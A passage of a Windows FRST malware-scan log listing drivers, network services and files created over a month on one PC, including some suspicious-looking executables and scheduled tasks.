R3 Microsoft_Bluetooth_AvrcpTransport; C:\Windows\system32\DRIVERS\Microsoft.Bluetooth.AvrcpTransport.sys [46592 2018-04-12] (Microsoft Corporation)
R3 MSIO; C:\Program Files\Patriot\Aac_Patriot Viper RGB\msio64.sys [25616 2018-02-12] ()
S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_485c1c3102021986\nvlddmkm.sys [17200392 2018-06-25] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30656 2018-05-23] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [67432 2018-05-23] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [68112 2018-05-23] (NVIDIA Corporation)
S3 passthruparser; C:\Windows\System32\drivers\passthruparser.sys [24064 2018-06-09] (Microsoft Corporation)
S3 pcip; C:\Windows\System32\drivers\pcip.sys [47616 2018-06-09] (Microsoft Corporation)
S3 pvhdparser; C:\Windows\System32\drivers\pvhdparser.sys [51712 2018-06-09] (Microsoft Corporation)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2013-09-30] ()
S3 ramparser; C:\Windows\System32\drivers\ramparser.sys [31744 2018-06-09] (Microsoft Corporation)
R3 RtsUpx; C:\Windows\system32\drivers\RtsUpx.sys [30328 2018-06-03] (Realtek Semiconductor Corp.)
S3 smbdirect; C:\Windows\System32\DRIVERS\smbdirect.sys [152064 2018-04-12] (Microsoft Corporation)
R3 Synth3dVsp; C:\Windows\System32\drivers\synth3dvsp.sys [103936 2018-06-09] (Microsoft Corporation)
S3 usbrndis6; C:\Windows\System32\drivers\usb80236.sys [22016 2018-04-12] (Microsoft Corporation)
R3 VBoxNetAdp; C:\Windows\system32\DRIVERS\VBoxNetAdp6.sys [213080 2018-05-09] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\system32\DRIVERS\VBoxNetLwf.sys [222864 2018-05-09] (Oracle Corporation)
R1 VfpExt; C:\Windows\System32\drivers\vfpext.sys [1245184 2018-06-09] (Microsoft Corporation)
S3 vhdparser; C:\Windows\System32\drivers\vhdparser.sys [34304 2018-06-09] (Microsoft Corporation)
R3 vmsmp; C:\Windows\System32\drivers\vmswitch.sys [1777152 2018-08-03] (Microsoft Corporation)
R0 VMSNPXY; C:\Windows\System32\drivers\VmsProxyHNic.sys [36768 2018-06-09] (Microsoft Corporation)
R3 VMSNPXYMP; C:\Windows\System32\drivers\VmsProxyHNic.sys [36768 2018-06-09] (Microsoft Corporation)
S3 WdBoot; C:\Windows\system32\drivers\wd\WdBoot.sys [46072 2018-06-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\wd\WdFilter.sys [313384 2018-06-03] (Microsoft Corporation)
S3 wdm_usb; C:\Windows\system32\DRIVERS\usb2ser.sys [151184 2016-07-15] (MBB)
S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [61992 2018-06-03] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: HgClientService -> C:\Windows\system32\hgclientservice.dll (Microsoft Corporation)
NETSVC: nvagent -> C:\Windows\System32\NvAgent.dll (Microsoft Corporation)
NETSVC: hns -> C:\Windows\System32\HostNetSvc.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-08-24 21:34 - 2018-08-24 21:34 - 000029848 _____ C:\Users\cheat\Desktop\FRST.txt
2018-08-24 21:34 - 2018-08-24 21:34 - 000000000 ____D C:\FRST
2018-08-24 21:32 - 2018-08-24 21:32 - 002413056 _____ (Farbar) C:\Users\cheat\Desktop\FRST64.exe
2018-08-24 21:08 - 2018-08-24 21:08 - 001676800 _____ C:\Windows\IEcache.exe
2018-08-24 21:08 - 2018-08-24 21:08 - 001676798 _____ C:\Windows\IE.exe
2018-08-23 22:39 - 2018-08-23 22:39 - 000000000 _____ C:\Users\cheat\Desktop\IDM download import.txt
2018-08-23 21:18 - 2018-08-24 14:42 - 000000000 ____D C:\Program Files (x86)\DVDVideoSoft
2018-08-23 21:18 - 2018-08-23 21:18 - 000003548 _____ C:\Windows\System32\Tasks\Menu
2018-08-23 21:18 - 2018-08-23 21:18 - 000001379 _____ C:\Users\Public\Desktop\Free YouTube Download.lnk
2018-08-23 21:06 - 2008-08-18 19:18 - 000077824 _____ (Fox Magic Software) C:\Windows\SysWOW64\fmcodec.DLL
2018-08-23 20:55 - 2018-08-23 20:55 - 000000000 ____D C:\ProgramData\DigitalWave.ApplicationUpdater_files
2018-08-23 20:55 - 2018-08-23 20:55 - 000000000 ____D C:\Program Files (x86)\FreeCodecPack
2018-08-23 20:54 - 2018-08-24 21:06 - 000000000 ____D C:\Users\cheat\AppData\Roaming\DVDVideoSoft
2018-08-21 21:08 - 2018-08-21 21:08 - 000000000 ____D C:\ProgramData\AutoUpdate
2018-08-21 21:08 - 2018-08-21 21:08 - 000000000 ____D C:\ProgramData\Airy Team
2018-08-21 21:04 - 2018-08-21 21:04 - 000000000 ____D C:\Program Files\4KDownload
2018-08-21 21:03 - 2018-08-21 21:03 - 000003566 _____ C:\Windows\System32\Tasks\anydesk
2018-08-21 20:55 - 2018-08-21 20:55 - 000001173 _____ C:\Users\Public\Desktop\Direct Video Downloader.lnk
2018-08-21 20:55 - 2018-08-21 20:55 - 000000048 _____ C:\Windows\system32\mslspd.cer
2018-08-21 20:55 - 2018-08-21 20:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct Video Downloader
2018-08-21 20:55 - 2018-08-21 20:55 - 000000000 ____D C:\Program Files (x86)\Direct Video Downloader
2018-08-19 18:53 - 2018-08-19 18:53 - 000000000 ____D C:\MagicPlusMini
2018-08-19 18:19 - 2018-08-19 18:19 - 000259360 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-08-19 18:19 - 2018-08-19 18:19 - 000001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-08-19 18:19 - 2018-08-19 18:19 - 000000000 ____D C:\Users\cheat\AppData\Local\mbam
2018-08-19 18:19 - 2018-08-19 18:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-08-19 18:19 - 2018-07-12 08:42 - 000152688 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2018-08-19 18:17 - 2018-08-19 18:18 - 000000000 ____D C:\Users\cheat\AppData\Roaming\PE Explorer
2018-08-19 18:17 - 2018-08-19 18:17 - 000001106 _____ C:\Users\cheat\Desktop\PE Explorer.lnk
2018-08-19 18:17 - 2018-08-19 18:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PE Explorer
2018-08-19 18:17 - 2018-08-19 18:17 - 000000000 ____D C:\Program Files (x86)\PE Explorer
2018-08-19 16:14 - 2018-08-19 16:14 - 000001064 _____ C:\Users\cheat\Desktop\MakeMKV.lnk
2018-08-19 16:14 - 2018-08-19 16:14 - 000000000 ____D C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MakeMKV
2018-08-19 16:14 - 2018-08-19 16:14 - 000000000 ____D C:\Users\cheat\.MakeMKV
2018-08-19 16:13 - 2018-08-19 16:14 - 000000000 ____D C:\Program Files (x86)\MakeMKV
2018-08-18 21:08 - 2018-08-24 21:35 - 000000000 ____D C:\Users\cheat\AppData\Roaming\uTorrent
2018-08-18 21:08 - 2018-08-18 21:08 - 000000995 _____ C:\Users\cheat\Desktop\µTorrent.lnk
2018-08-17 20:21 - 2018-08-23 21:18 - 296048640 __RSH C:\Users\cheat\AppData\Roaming\sui.exe
2018-08-14 21:24 - 2018-08-03 10:39 - 021389368 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2018-08-14 21:24 - 2018-08-03 10:39 - 000790304 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2018-08-14 21:24 - 2018-08-03 10:25 - 000178176 _____ (Microsoft Corporation) C:\Windows\system32\t2embed.dll
2018-08-14 21:24 - 2018-08-03 10:25 - 000123392 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2018-08-14 21:24 - 2018-08-03 10:24 - 000099328 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2018-08-14 21:24 - 2018-08-03 10:24 - 000066048 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2018-08-14 21:24 - 2018-08-03 10:24 - 000046592 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2018-08-14 21:24 - 2018-08-03 10:22 - 001127936 _____ (Microsoft Corporation) C:\Windows\system32\nettrace.dll
2018-08-14 21:24 - 2018-08-03 10:21 - 001364992 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvruserservice.dll
2018-08-14 21:24 - 2018-08-03 10:21 - 001121792 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2018-08-14 21:24 - 2018-08-03 10:21 - 000765440 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2018-08-14 21:24 - 2018-08-03 10:21 - 000561152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2018-08-14 21:24 - 2018-08-03 10:21 - 000391680 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2018-08-14 21:24 - 2018-08-03 10:20 - 004049408 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2018-08-14 21:24 - 2018-08-03 10:20 - 003652608 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2018-08-14 21:24 - 2018-08-03 10:20 - 000134144 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2018-08-14 21:24 - 2018-08-03 10:19 - 001661440 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2018-08-14 21:24 - 2018-08-03 09:45 - 000663128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2018-08-14 21:24 - 2018-08-03 09:43 - 020383720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2018-08-14 21:24 - 2018-08-03 09:33 - 000138752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\t2embed.dll
2018-08-14 21:24 - 2018-08-03 09:33 - 000098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2018-08-14 21:24 - 2018-08-03 09:32 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2018-08-14 21:24 - 2018-08-03 09:30 - 000099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2018-08-14 21:24 - 2018-08-03 09:29 - 000621568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2018-08-14 21:24 - 2018-08-03 09:29 - 000343552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2018-08-14 21:24 - 2018-08-03 09:28 - 002895360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2018-08-14 21:24 - 2018-08-03 09:27 - 004050432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2018-08-14 21:24 - 2018-08-03 09:27 - 001469952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2018-08-14 21:24 - 2018-08-03 07:41 - 001008640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.MixedRealityCapture.dll
2018-08-14 21:24 - 2018-08-03 06:49 - 000868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.MixedRealityCapture.dll
2018-08-14 21:24 - 2018-08-03 05:47 - 002301144 _____ (Microsoft Corporation) C:\Windows\system32\vmwp.exe
2018-08-14 21:24 - 2018-08-03 05:47 - 001034624 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe
2018-08-14 21:24 - 2018-08-03 05:47 - 000128920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2018-08-14 21:24 - 2018-08-03 05:46 - 000272296 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave.dll
2018-08-14 21:24 - 2018-08-03 05:46 - 000269248 _____ (Microsoft Corporation) C:\Windows\system32\SgrmEnclave_secure.dll
2018-08-14 21:24 - 2018-08-03 05:41 - 000568600 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe
2018-08-14 21:24 - 2018-08-03 05:41 - 000077608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hvservice.sys
2018-08-14 21:24 - 2018-08-03 05:41 - 000061736 _____ (Microsoft Corporation) C:\Windows\system32\hvhostsvc.dll
2018-08-14 21:24 - 2018-08-03 05:40 - 001221048 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe
2018-08-14 21:24 - 2018-08-03 05:40 - 001064744 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
2018-08-14 21:24 - 2018-08-03 05:40 - 001030952 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe
2018-08-14 21:24 - 2018-08-03 05:40 - 000566568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2018-08-14 21:24 - 2018-08-03 05:40 - 000228136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Ucx01000.sys
2018-08-14 21:24 - 2018-08-03 05:40 - 000136488 _____ (Microsoft Corporation) C:\Windows\system32\hvloader.dll
2018-08-14 21:24 - 2018-08-03 05:40 - 000072800 _____ (Microsoft Corporation) C:\Windows\system32\wldp.dll
2018-08-14 21:24 - 2018-08-03 05:39 - 009091480 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2018-08-14 21:24 - 2018-08-03 05:39 - 007519992 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2018-08-14 21:24 - 2018-08-03 05:39 - 007436120 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2018-08-14 21:24 - 2018-08-03 05:39 - 002829216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2018-08-14 21:24 - 2018-08-03 05:39 - 001457136 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2018-08-14 21:24 - 2018-08-03 05:39 - 000709824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2018-08-14 21:24 - 2018-08-03 05:39 - 000692240 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2018-08-14 21:24 - 2018-08-03 05:39 - 000170936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2018-08-14 21:24 - 2018-08-03 05:39 - 000114080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbus.sys
2018-08-14 21:24 - 2018-08-03 05:39 - 000075160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpci.sys
2018-08-14 21:24 - 2018-08-03 05:39 - 000031648 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhv.sys
2018-08-14 21:24 - 2018-08-03 05:38 - 002765440 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 001945792 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 001285536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2018-08-14 21:24 - 2018-08-03 05:38 - 001258288 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2018-08-14 21:24 - 2018-08-03 05:38 - 001140576 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2018-08-14 21:24 - 2018-08-03 05:38 - 001097648 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 000983016 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2018-08-14 21:24 - 2018-08-03 05:38 - 000885856 _____ (Microsoft Corporation) C:\Windows\system32\CoreMessaging.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 000713368 _____ (Microsoft Corporation) C:\Windows\system32\MSVideoDSP.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 000604576 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe
2018-08-14 21:24 - 2018-08-03 05:38 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\vertdll.dll
2018-08-14 21:24 - 2018-08-03 05:38 - 000115640 _____ (Microsoft Corporation) C:\Windows\system32\kdnet.dll
2018-08-14 21:24 - 2018-08-03 05:27 - 000061032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wldp.dll
2018-08-14 21:24 - 2018-08-03 05:26 - 006043600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 006568784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 002255008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 001622296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 001131064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvproc.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 000583120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVideoDSP.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 000568568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2018-08-14 21:24 - 2018-08-03 05:25 - 000539168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2018-08-14 21:24 - 2018-08-03 05:23 - 025846784 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2018-08-14 21:24 - 2018-08-03 05:18 - 022714880 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2018-08-14 21:24 - 2018-08-03 05:18 - 022007808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2018-08-14 21:24 - 2018-08-03 05:17 - 004380160 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll
2018-08-14 21:24 - 2018-08-03 05:17 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmgid.sys
2018-08-14 21:24 - 2018-08-03 05:16 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2018-08-14 21:24 - 2018-08-03 05:16 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys
2018-08-14 21:24 - 2018-08-03 05:16 - 000018432 _____ (Microsoft Corporation) C:\Windows\system32\winshfhc.dll
2018-08-14 21:24 - 2018-08-03 05:15 - 008188928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2018-08-14 21:24 - 2018-08-03 05:15 - 000068096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhvr.sys
2018-08-14 21:24 - 2018-08-03 05:14 - 004867584 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2018-08-14 21:24 - 2018-08-03 05:14 - 000514560 _____ (Microsoft Corporation) C:\Windows\system32\nltest.exe
2018-08-14 21:24 - 2018-08-03 05:14 - 000209408 _____ (Microsoft Corporation) C:\Windows\system32\AppXApplicabilityBlob.dll
2018-08-14 21:24 - 2018-08-03 05:14 - 000167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbusr.sys
2018-08-14 21:24 - 2018-08-03 05:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\WaaSAssessment.dll
2018-08-14 21:24 - 2018-08-03 05:13 - 019404288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2018-08-14 21:24 - 2018-08-03 05:13 - 006661632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2018-08-14 21:24 - 2018-08-03 05:13 - 003395072 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2018-08-14 21:24 - 2018-08-03 05:13 - 003014656 _____ (Microsoft Corporation) C:\Windows\system32\vmcompute.exe
2018-08-14 21:24 - 2018-08-03 05:13 - 000395776 _____ (Microsoft Corporation) C:\Windows\system32\Search.ProtocolHandler.MAPI2.dll
2018-08-14 21:24 - 2018-08-03 05:13 - 000154112 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 003392000 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 002738688 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 000894464 _____ (Microsoft Corporation) C:\Windows\system32\webplatstorageserver.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 000761344 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 000726528 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2018-08-14 21:24 - 2018-08-03 05:12 - 000311296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2018-08-14 21:24 - 2018-08-03 05:11 - 007577088 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 003712000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 002700288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 002172928 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 001708544 _____ (Microsoft Corporation) C:\Windows\system32\MSPhotography.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 000983040 _____ (Microsoft Corporation) C:\Windows\system32\wbiosrvc.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 000898560 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
2018-08-14 21:24 - 2018-08-03 05:11 - 000808448 _____ (Microsoft Corporation) C:\Windows\system32\EdgeManager.dll
2018-08-14 21:24 - 2018-08-03 05:10 - 001535488 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2018-08-14 21:24 - 2018-08-03 05:10 - 000373760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Vid.sys
2018-08-14 21:24 - 2018-08-03 05:10 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winshfhc.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 005776896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 004615680 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001932288 _____ (Microsoft Corporation) C:\Windows\system32\edgeangle.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001854976 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001550848 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001395200 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001361408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSPhotography.dll
2018-08-14 21:24 - 2018-08-03 05:09 - 001057792 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2018-08-14 21:24 - 2018-08-03 05:09 - 000916480 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 002258944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 002236928 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2018-08-14 21:24 - 2018-08-03 05:08 - 001777152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmswitch.sys
2018-08-14 21:24 - 2018-08-03 05:08 - 000796672 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000776192 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000608768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EdgeManager.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000602112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000561152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000542208 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000406528 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2018-08-14 21:24 - 2018-08-03 05:08 - 000331264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgeIso.dll
2018-08-14 21:24 - 2018-08-03 05:08 - 000288768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2018-08-14 21:24 - 2018-08-03 05:07 - 000578560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webplatstorageserver.dll
2018-08-14 21:24 - 2018-08-03 05:07 - 000505344 _____ (Microsoft Corporation) C:\Windows\system32\edgeIso.dll
2018-08-14 21:24 - 2018-08-03 05:07 - 000176640 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2018-08-14 21:24 - 2018-08-03 05:07 - 000115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2018-08-14 21:24 - 2018-08-03 05:06 - 004191232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2018-08-14 21:24 - 2018-08-03 05:06 - 001000448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2018-08-14 21:24 - 2018-08-03 05:06 - 000856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2018-08-14 21:24 - 2018-08-03 05:06 - 000678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2018-08-14 21:24 - 2018-08-03 05:06 - 000619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
2018-08-14 21:24 - 2018-08-03 05:06 - 000251904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msIso.dll
2018-08-14 21:24 - 2018-08-03 05:05 - 000735744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2018-08-14 21:24 - 2018-08-03 05:05 - 000669696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2018-08-14 21:24 - 2018-08-03 05:05 - 000534016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2018-08-14 21:24 - 2018-08-03 05:04 - 000345088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2018-08-14 21:24 - 2018-08-03 03:54 - 000001312 _____ C:\Windows\system32\tcbres.wim
2018-08-09 14:13 - 2018-08-24 21:09 - 000000005 _____ C:\Windows\SysWOW64\proc.txt
2018-08-09 14:10 - 2018-08-09 14:10 - 000003772 _____ C:\Windows\System32\Tasks\SystemSettingss
2018-08-09 14:10 - 2018-08-09 14:10 - 000000003 _____ C:\Users\cheat\ccac.txt
2018-08-05 01:17 - 2018-08-05 01:17 - 000001827 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wireshark.lnk
2018-08-05 01:17 - 2018-08-05 01:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2018-08-05 01:17 - 2018-08-05 01:17 - 000000000 ____D C:\Program Files (x86)\WinPcap
2018-08-05 01:09 - 2018-08-05 01:17 - 000000000 ____D C:\Program Files\Wireshark
2018-08-04 15:08 - 2018-07-30 04:08 - 001074688 _____ C:\Users\cheat\Desktop\Victimisation.dll
2018-08-02 22:05 - 2018-08-16 07:12 - 000000000 ____D C:\Windows\Minidump
2018-07-29 20:49 - 2018-07-29 20:49 - 000000000 ____D C:\Users\cheat\AppData\Roaming\PopstarExternal
2018-07-29 20:49 - 2018-07-27 23:41 - 000991232 _____ C:\Users\cheat\Desktop\popstar_external.exe
2018-07-29 15:20 - 2018-07-29 15:31 - 000000412 __RSH C:\ProgramData\ntuser.pol
2018-07-27 23:02 - 2018-07-27 23:04 - 000000000 ____D C:\Users\cheat\AppData\Roaming\Stellarium
2018-07-27 23:02 - 2018-07-27 23:02 - 000001761 _____ C:\Users\Public\Desktop\Stellarium.lnk
2018-07-27 23:02 - 2018-07-27 23:02 - 000000000 ____D C:\Users\cheat\AppData\Local\stellarium
2018-07-27 23:02 - 2018-07-27 23:02 - 000000000 ____D C:\Users\cheat\AppData\Local\cache
2018-07-27 23:02 - 2018-07-27 23:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stellarium
2018-07-27 23:01 - 2018-07-27 23:02 - 000000000 ____D C:\Program Files\Stellarium
